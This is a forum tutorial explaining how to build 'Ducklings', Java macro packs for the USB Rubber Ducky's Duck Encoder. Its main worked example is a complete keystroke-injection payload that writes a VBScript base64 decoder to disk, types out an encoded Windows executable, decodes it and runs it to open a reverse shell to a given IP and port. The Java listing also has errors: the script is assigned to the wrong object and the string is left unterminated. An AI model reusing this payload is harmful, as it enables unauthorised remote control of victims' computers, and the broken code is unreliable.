Jump to content

[Tutorial] Ducklings 101

ApacheTech Consultancy
 Share

Recommended Posts

ApacheTech Consultancy Newbie

ApacheTech Consultancy

Posted
Posted

What is a Duckling?

New to Duck Encoder v3.0.0, Ducklings are JAR files full of stored procedures or macros which can make writing DuckyScripts a lot easier and more streamlined. They are housed within the "ducklings" sub-directory, wherever your encoder is installed.

Ducklings use a similar syntax to regular DuckyScript, but introduce a new prefixed namespace for each Duckling:

NAMESPACE::COMMAND arguments


The namespace for each duckling will be described within its documentation, and can be found be executing the .duckling.jar file. This will also list all the syntax available within the duckling, as well as details about the author, version and so forth.

java -jar SamplePack.duckling.jar


Ducklings are currently in open beta until we gain enough feedback to confirm they are stable. Please help us with this task and send us your feedback.

So, how do they work?

Ducklings work by resolving a single line entry into a multi-line script snippet, inline with where it needs to be in the code. It is possible to use multiple ducklings within the same script, it is even possible to nest duckling macros inside each other, so long as all dependency files are available when the script is encoded.

The main limitation is that the REPEAT command will merely repeat the last line of the stored procedure, not the macro itself. This will hopefully be resolved in a later version, once the Ducklings are known to be fully stable.

Within the SamplePack.duckling.jar included within the v3.0.0 release of the encoder, there is a single macro called "HELLOWORLD", and the namespace for the Duckling is "SAMPLE". To use this within a script, we use the new namespacing syntax:

SAMPLE::HELLOWORLD It Works! :D


This is then translated, inline, into the following script when it is encoded:

STRING Hello World!
STRING You Wrote: It Works! :D


Obviously, this is only a very basic example, but pretty much any payload can be stored within a duckling and executed using a single line.

Example:

REM Runs a Remote Shell to 192.168.1.7 on port 2600.
WINNET::RSHELL host 192.168.1.7 sap 2600

How do I create my own Duckling?

The source code for the ducklings is available here:

Zip: http://ducky-decode.googlecode.com/files/SamplePack.duckling.zip (7ac17bc509334fb92b8f5b8e193a9b822b7b31ca)
Svn: http://code.google.com/p/ducky-decode/source/browse/#svn/trunk/Ducklings/v1/SamplePack.duckling

A basic knowledge of Java (or at least C-style syntax) is needed until a generator is developed. The source code is relatively self-explanatory, I created the ducklings from scratch after only four days of ever coding in Java, so it's not overly complicated at all.

The only files we're interested in are the Duckling.java file and the Main.java.

Duckling.java:

First, we need to set the namespace for the duckling:

/**
* TODO: Set the namespace for the duckling.
*/
private String mNamespace = "WINNET";


Then, declare a new macro and add it to the macro list.

    /**
     * TODO: Declare and initialise your macros.
     */
    private void InitialiseMacros() {

        /**
         * TODO: Declare each macro in turn and add it to the dictionary.
         */
        Macro RemoteShell= new Macro("RSHELL", "host-ip port-number");
        RemoteShell.setDescription("Opens a remote shell to a given ip address on a specific port.");
        HelloWorld.setScript("DELAY 600\n"
                            + "ESCAPE\n"
                            + "ESCAPE\n"
                            + "DELAY 400\n"
                            + "WINDOWS R\n"
                            + "DELAY 400\n"
                            + "STRING cmd\n"
                            + "DELAY 400\n"
                            + "ENTER\n"
                            + "DELAY 400\n"
                            + "STRING copy con c:\\decoder.vbs\n"
                            + "ENTER\n"
                            + "STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)\n"
                            + "STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = \n"
                            + "STRING CreateObject(\"Scripting.FileSystemObject\"):\n"
                            + "ENTER\n"
                            + "STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = \n"
                            + "STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function \n"
                            + "STRING decodeBase64(base64):\n"
                            + "ENTER\n"
                            + "STRING dim DM, EL:Set DM = CreateObject(\"Microsoft.XMLDOM\"):Set EL = DM.createElement(\"tmp\"):\n"
                            + "STRING EL.DataType = \"bin.base64\":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub \n"
                            + "STRING writeBytes(file, bytes):Dim binaryStream:\n"
                            + "ENTER\n"
                            + "STRING Set binaryStream = CreateObject(\"ADODB.Stream\"):binaryStream.Type = 1:\n"
                            + "STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub\n"
                            + "ENTER\n"
                            + "CTRL z\n"
                            + "ENTER\n"
                            + "STRING copy con c:\\reverse.txt\n"
                            + "ENTER\n"
                            + "STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA\n"
                            + "ENTER\n"
                            + "STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA\n"
                            + "ENTER\n"
                            + "STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA\n"
                            + "ENTER\n"
                            + "STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
                            + "ENTER\n"
                            + "STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS\n"
                            + "ENTER\n"
                            + "STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA\n"
                            + "ENTER\n"
                            + "STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2\n"
                            + "ENTER\n"
                            + "STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A\n"
                            + "ENTER\n"
                            + "STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA\n"
                            + "ENTER\n"
                            + "STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA\n"
                            + "ENTER\n"
                            + "STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq\n"
                            + "ENTER\n"
                            + "STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF\n"
                            + "ENTER\n"
                            + "STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv\n"
                            + "ENTER\n"
                            + "STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp\n"
                            + "ENTER\n"
                            + "STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm\n"
                            + "ENTER\n"
                            + "STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A\n"
                            + "ENTER\n"
                            + "STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s\n"
                            + "ENTER\n"
                            + "STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9\n"
                            + "ENTER\n"
                            + "STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp\n"
                            + "ENTER\n"
                            + "STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY\n"
                            + "ENTER\n"
                            + "STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B\n"
                            + "ENTER\n"
                            + "STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk\n"
                            + "ENTER\n"
                            + "STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA\n"
                            + "ENTER\n"
                            + "STRING AAxAAADpdL7//wAAAAIAAAAMQAAA\n"
                            + "ENTER\n"
                            + "CTRL z\n"
                            + "ENTER\n"
                            + "STRING cscript c:\\decoder.vbs c:\\reverse.txt c:\\reverse.exe\n"
                            + "ENTER\n"
                            + "STRING c:\\reverse.exe %s %s\n"
                            + "ENTER\n"
                            + "STRING exit\n"
                            + "ENTER\n"
        this.MacroList.put("RSHELL", RemoteShell);
    }

The arguments ([host-ip] and [port-number]) are put in place using the standard Java %s string substitution method. Make sure your arguments go in order of where your %s placeholders are within the script. Within the initialiser, the arguments are only for the documentation, but their order is vitally important.

As the ducklings develop, more features will be added, but due to their structure and the development process they will go though, I'm afraid we cannot guarantee any backwards compatibility between subversions of the duckling source.

Main.java:

Here, all we need to change is the personal information about the duckling.

    private static String Title = "Windows Network and Internet Tools";
    private static String Version = "1.0.0.a";
    private static String Author = "Apache - ApacheTech Consultancy";

Then just export the project as a runnable JAR file (the procedure differs on various IDEs) and you're done.

Again, please let us know your feedback and any suggestions you may have for development.

Developer Info:

Duckling Development Stage: Open Beta
Duckling Factory Development Stage: Pre-Alpha

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...